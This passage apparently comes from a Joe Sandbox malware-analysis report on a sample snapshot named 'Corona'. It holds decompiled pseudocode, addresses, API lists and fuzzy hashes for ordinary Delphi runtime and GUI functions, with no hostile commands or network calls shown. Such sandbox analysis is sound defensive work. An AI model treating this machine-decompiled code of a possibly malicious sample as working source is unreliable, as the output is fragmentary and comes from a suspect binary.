                                  • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0041FB8B
                                  • DeleteEnhMetaFile.GDI32(00000016), ref: 0041FBAC
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0041FBBF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileMeta$Bits$DeleteHeader
                                  • String ID: `
                                  • API String ID: 1990453761-2679148245
                                  • Opcode ID: 96213ee27622db648347686e85402db50df7a199058eb07d99711b2c886e866c
                                  • Instruction ID: 9ce931cf43a94e3a35a230facc405f151e3293912c0da2daa12de29306002b4d
                                  • Opcode Fuzzy Hash: 96213ee27622db648347686e85402db50df7a199058eb07d99711b2c886e866c
                                  • Instruction Fuzzy Hash: DB41ED75D04208AFDB00DFA9C485AEEB7F9EF48714F10846AF904EB241E7399D45CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00418EF8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00418EF8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x451128; // 0x452030
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x450fc4; // 0x4103a4
					E0040B2B0(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00403888();
				}
				if(_t53 <= 0) {
					E00418ED0();
				} else {
					E00418EDC(_t53);
				}
				_v16 = 0;
				_push(0x452868);
				L00405E3C();
				_push(_t72);
				_push(0x419086);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange( &E004503E8, _v16);
				_push(_t72);
				_push(0x419067);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L15:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E0041906E);
					return E004030FC(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E004136F8(_v16, 0);
						E004135E8(_v16, 0);
						L00405F64();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x419031, _t72, 0x452868);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x419002;
						 *[fs:eax] = _t67;
						_push(E00419038);
						_push(0x452868);
						L00405E3C();
						return 0;
					} else {
						goto L15;
					}
				}
			}



















                                  0x00418ef9
                                  0x00418efb
                                  0x00418eff
                                  0x00418f00
                                  0x00418f01
                                  0x00418f03
                                  0x00418f08
                                  0x00418f10
                                  0x00418f17
                                  0x00418f1a
                                  0x00418f24
                                  0x00418f31
                                  0x00418f36
                                  0x00418f36
                                  0x00418f3d
                                  0x00418f48
                                  0x00418f3f
                                  0x00418f41
                                  0x00418f41
                                  0x00418f4f
                                  0x00418f52
                                  0x00418f57
                                  0x00418f5e
                                  0x00418f5f
                                  0x00418f64
                                  0x00418f67
                                  0x00418f78
                                  0x00418f7d
                                  0x00418f7e
                                  0x00418f83
                                  0x00418f86
                                  0x00418f8d
                                  0x00418f98
                                  0x00418f9c
                                  0x00418f9c
                                  0x00418f9c
                                  0x00418f9e
                                  0x00418fa5
                                  0x00419051
                                  0x00419053
                                  0x00419056
                                  0x00419059
                                  0x00419066
                                  0x00418fab
                                  0x0041904b
                                  0x00418fba
                                  0x00418fc2
                                  0x00418fcc
                                  0x00418fdc
                                  0x00418fea
                                  0x00418ff5
                                  0x00418ffa
                                  0x00418ffd
                                  0x0041901b
                                  0x0041901e
                                  0x00419021
                                  0x00419026
                                  0x0041902b
                                  0x00419030
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041904b

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00418F03
                                  • GetCurrentThreadId.KERNEL32 ref: 00418F12
                                    • Part of subcall function 00418ED0: ResetEvent.KERNEL32(00000180,00418F4D,?,?,00000000), ref: 00418ED6
                                  • RtlEnterCriticalSection.KERNEL32(00452868,?,?,00000000), ref: 00418F57
                                  • InterlockedExchange.KERNEL32(004503E8,?), ref: 00418F73
                                  • RtlLeaveCriticalSection.KERNEL32(00452868,00000000,00419067,?,00000000,00419086,?,00452868,?,?,00000000), ref: 00418FCC
                                  • RtlEnterCriticalSection.KERNEL32(00452868,00419038,00419067,?,00000000,00419086,?,00452868,?,?,00000000), ref: 0041902B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                  • String ID: 0 E
                                  • API String ID: 2189153385-1209576767
                                  • Opcode ID: 0f0de51c7ad39bf4329b17c8d760aeec53a8f8fbb9996d7d22b560f6f2aafe57
                                  • Instruction ID: 468ee6b9b45cb750b43f03cd02a5ab5e3ddab11ee958945834f90c42d7968ca2
                                  • Opcode Fuzzy Hash: 0f0de51c7ad39bf4329b17c8d760aeec53a8f8fbb9996d7d22b560f6f2aafe57
                                  • Instruction Fuzzy Hash: F331E630A04704AFD711DF65C852AAEBBF9EB49704F6184BBF804A3691CB7C9D44CA29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00423AAC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00423AAC(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x452924 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00405FF4();
						}
						_t24 = 1;
					}
				} else {
					 *0x452908 = E0042377C(4, _t23,  *0x452908, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                  0x00423ab5
                                  0x00423ab8
                                  0x00423ac2
                                  0x00423ae7
                                  0x00423aef
                                  0x00423b0f
                                  0x00423b14
                                  0x00423b1f
                                  0x00423b2a
                                  0x00423b34
                                  0x00423b35
                                  0x00423b36
                                  0x00423b37
                                  0x00423b38
                                  0x00423b39
                                  0x00423b43
                                  0x00423b45
                                  0x00423b4d
                                  0x00423b4e
                                  0x00423b4e
                                  0x00423b53
                                  0x00423b53
                                  0x00423ac4
                                  0x00423ad6
                                  0x00423ae3
                                  0x00423ae3
                                  0x00423b5d

                                  APIs
                                  • GetMonitorInfoA.USER32(?,?), ref: 00423ADD
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423B04
                                  • GetSystemMetrics.USER32 ref: 00423B19
                                  • GetSystemMetrics.USER32 ref: 00423B24
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00423B4E
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfo
                                  • API String ID: 1539801207-1633989206
                                  • Opcode ID: 3948025942b87be14b94fa04fe8614c938f02bd6c0ab9e29af396eeeeddd1b7f
                                  • Instruction ID: a9d37633d9173def41a8ba462371619da7ffd0f1340763b36fecd0d1b352b927
                                  • Opcode Fuzzy Hash: 3948025942b87be14b94fa04fe8614c938f02bd6c0ab9e29af396eeeeddd1b7f
                                  • Instruction Fuzzy Hash: 2411E4717013155FDB209F64AC44BA7BBF8EB06352F40453BE94697342D3B8B940CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00423C54, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 47%
                                  			E00423C54(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x452926 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00405FF4();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x452910; // 0x423c54
					 *0x452910 = E0042377C(6, _t23, _t26, _t27, _t29);
					_t24 =  *0x452910(_t27, _t29);
				}
				return _t24;
			}














                                  0x00423c5d
                                  0x00423c60
                                  0x00423c6a
                                  0x00423c8f
                                  0x00423c97
                                  0x00423cb7
                                  0x00423cbc
                                  0x00423cc7
                                  0x00423cd2
                                  0x00423cdc
                                  0x00423cdd
                                  0x00423cde
                                  0x00423cdf
                                  0x00423ce0
                                  0x00423ce1
                                  0x00423ceb
                                  0x00423ced
                                  0x00423cf5
                                  0x00423cf6
                                  0x00423cf6
                                  0x00423cfb
                                  0x00423cfb
                                  0x00423c6c
                                  0x00423c71
                                  0x00423c7e
                                  0x00423c8b
                                  0x00423c8b
                                  0x00423d05

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423CAC
                                  • GetSystemMetrics.USER32 ref: 00423CC1
                                  • GetSystemMetrics.USER32 ref: 00423CCC
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00423CF6
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoW$T<B
                                  • API String ID: 2545840971-3502606048
                                  • Opcode ID: 26a8972663c3bf4d49ad55f6186b034620a71b6943241b99d3f98adaac11bab3
                                  • Instruction ID: 9924f744eb8a59d183caab76218475336e3e47cb355a25965acab20640003ac7
                                  • Opcode Fuzzy Hash: 26a8972663c3bf4d49ad55f6186b034620a71b6943241b99d3f98adaac11bab3
                                  • Instruction Fuzzy Hash: D71124727013155FD720DF66AC457A7B7B8EB06312F40492BFC56A7241C7F8AA408BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403CD0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00403CD0(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x452048 == 0) {
					if( *0x450030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x45221c == 0xd7b2 &&  *0x452224 > 0) {
						 *0x452234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D58, 2,  &_v4, 0);
				}
			}





                                  0x00403cd8
                                  0x00403d38
                                  0x00403d48
                                  0x00403d48
                                  0x00403d4e
                                  0x00403cda
                                  0x00403ce3
                                  0x00403cf3
                                  0x00403cf3
                                  0x00403d0f
                                  0x00403d30
                                  0x00403d30

                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0044F588,00000000,?,00403D9E,?,?,?,00000001,00403E3E,004027CB,00402813,?,00000000), ref: 00403D09
                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0044F588,00000000,?,00403D9E,?,?,?,00000001,00403E3E,004027CB,00402813), ref: 00403D0F
                                  • GetStdHandle.KERNEL32(000000F5,00403D58,00000002,0044F588,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0044F588,00000000,?,00403D9E), ref: 00403D24
                                  • WriteFile.KERNEL32(00000000,000000F5,00403D58,00000002,0044F588,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0044F588,00000000,?,00403D9E), ref: 00403D2A
                                  • MessageBoxA.USER32 ref: 00403D48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileHandleWrite$Message
                                  • String ID: Error$Runtime error at 00000000
                                  • API String ID: 1570097196-2970929446
                                  • Opcode ID: 1bc8f0b3b7ddf434434e4ab14f171152d6f6d2f90f953c27f7da1ec9df335ea4
                                  • Instruction ID: d25cad25df8e8659ab3ff43e7699d105ea690c04be041c70749b85a8f5bed30a
                                  • Opcode Fuzzy Hash: 1bc8f0b3b7ddf434434e4ab14f171152d6f6d2f90f953c27f7da1ec9df335ea4
                                  • Instruction Fuzzy Hash: F5F0966568538078FA20B7946D07F9B264C4745F17F20467FB614B80E387FC8584D66E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043B7EC, Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 39%
                                  			E0043B7EC(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E0043B38C(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E00421094(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E004223CC(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E0041CBF8( *((intOrPtr*)(E0042165C( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E004122C4(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E0042165C( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E0041CF9C(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E0041D2CC(E0042165C( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E0043B4C8(_t118));
						L004236D4();
						E004122C4(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E0041D2CC(E0042165C( *((intOrPtr*)(_t118 + 0x54))));
						E0041CBF8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E0041D2CC(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L00406014();
						E0041CBF8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E0041D2CC(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L00406014();
						return _t96;
					}
					_push(_a8);
					_push(E0043B1DC(_t142));
					E0043B7C4(_t118, _t142);
					_push(E0043B1DC(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E0041D2CC(__ecx));
					_push(_v8);
					_t117 = E0043B4C8(_t118);
					_push(_t117);
					L004236D4();
					return _t117;
				}
				return _t46;
			}




















                                  0x0043b7ec
                                  0x0043b7f5
                                  0x0043b7f7
                                  0x0043b7fa
                                  0x0043b7fe
                                  0x0043b805
                                  0x0043b80b
                                  0x0043b80f
                                  0x0043b855
                                  0x0043b859
                                  0x0043b867
                                  0x0043b869
                                  0x0043b870
                                  0x0043b87c
                                  0x0043b884
                                  0x0043b886
                                  0x0043b886
                                  0x0043b899
                                  0x0043b8ad
                                  0x0043b8b5
                                  0x0043b8b9
                                  0x0043b8be
                                  0x0043b8bf
                                  0x0043b8c4
                                  0x0043b8c6
                                  0x0043b8c8
                                  0x0043b8ca
                                  0x0043b8cc
                                  0x0043b8ce
                                  0x0043b8d0
                                  0x0043b8df
                                  0x0043b8e3
                                  0x0043b8eb
                                  0x0043b8ec
                                  0x0043b908
                                  0x0043b91a
                                  0x0043b925
                                  0x0043b931
                                  0x0043b939
                                  0x0043b941
                                  0x0043b946
                                  0x0043b94b
                                  0x0043b94d
                                  0x0043b952
                                  0x0043b956
                                  0x0043b95a
                                  0x0043b95f
                                  0x0043b963
                                  0x0043b963
                                  0x0043b964
                                  0x0043b965
                                  0x0043b966
                                  0x0043b973
                                  0x0043b97f
                                  0x0043b987
                                  0x0043b98f
                                  0x0043b994
                                  0x0043b999
                                  0x0043b99b
                                  0x0043b9a0
                                  0x0043b9a4
                                  0x0043b9a8
                                  0x0043b9ac
                                  0x0043b9ad
                                  0x0043b9b0
                                  0x0043b9b1
                                  0x0043b9b2
                                  0x00000000
                                  0x0043b9b2
                                  0x0043b814
                                  0x0043b81d
                                  0x0043b820
                                  0x0043b82a
                                  0x0043b82b
                                  0x0043b82d
                                  0x0043b832
                                  0x0043b836
                                  0x0043b83e
                                  0x0043b842
                                  0x0043b845
                                  0x0043b84a
                                  0x0043b84b
                                  0x00000000
                                  0x0043b84b
                                  0x0043b9bd

                                  APIs
                                  • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0043B84B
                                  • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0043B8EC
                                  • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0043B939
                                  • SetBkColor.GDI32(00000000,00000000), ref: 0043B941
                                  • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 0043B966
                                    • Part of subcall function 0043B7C4: 73452240.COMCTL32(00000000,?,0043B825,00000000,?), ref: 0043B7DA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 73452430Color$73452240E897Text
                                  • String ID:
                                  • API String ID: 3108427945-0
                                  • Opcode ID: ff7f43e51220a9331830a000d7053d2fad070fbfe78327324c379c6c3098ffa3
                                  • Instruction ID: 75d1f41abf72a4f6959905042e404fde6b0e7603268d965f267807dfd0857be0
                                  • Opcode Fuzzy Hash: ff7f43e51220a9331830a000d7053d2fad070fbfe78327324c379c6c3098ffa3
                                  • Instruction Fuzzy Hash: 9D511B71740114AFDB40EF69DD82F9E37ACAF08314F10115AFA14EB396CA78EC519769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044A840, Relevance: 12.1, APIs: 8, Instructions: 144windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0044A840(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x44ab08);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E0042D054();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x450f0c; // 0x41a494
					E0040597C(_t50,  &_v36);
					E0040B1B8(_v36, 1);
					E00403888();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x452bb0; // 0x2131714
				E0044CCE0(_t56);
				_push(_t127);
				_push(0x44aaeb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x450c24; // 0x2
				_v20 = _t60;
				_t61 =  *0x452bb4; // 0x2131320
				_t62 =  *0x452bb4; // 0x2131320
				E00413774( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t65 =  *0x452bb4; // 0x2131320
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x452bb4; // 0x2131320
				_v22 =  *((intOrPtr*)(_t66 + 0x44));
				_t68 =  *0x452bb4; // 0x2131320
				E0044BD10(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t70 =  *0x452bb4; // 0x2131320
				_v28 =  *((intOrPtr*)(_t70 + 0x48));
				_v16 = E00444C18(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x44aac9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E0044A790(_v8);
				_push(_t127);
				_push(0x44aa28);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E00434EF4(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x452bb0; // 0x2131714
					E0044DAEC(_t80, _t124, _t125);
					_t82 =  *0x452bb0; // 0x2131714
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E0044A6F0(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E00434EF4(_v8), 0xb001, 0, 0);
				_t90 = E00434EF4(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x44aa2f);
				return E0044A788();
			}





























                                  0x0044a840
                                  0x0044a840
                                  0x0044a840
                                  0x0044a841
                                  0x0044a843
                                  0x0044a846
                                  0x0044a847
                                  0x0044a84a
                                  0x0044a84d
                                  0x0044a852
                                  0x0044a853
                                  0x0044a858
                                  0x0044a85b
                                  0x0044a85e
                                  0x0044a86a
                                  0x0044a893
                                  0x0044a898
                                  0x0044a8a7
                                  0x0044a8ac
                                  0x0044a8ac
                                  0x0044a8b8
                                  0x0044a8c6
                                  0x0044a8c6
                                  0x0044a8cb
                                  0x0044a8d0
                                  0x0044a8d5
                                  0x0044a8dc
                                  0x0044a8dd
                                  0x0044a8e2
                                  0x0044a8e5
                                  0x0044a8eb
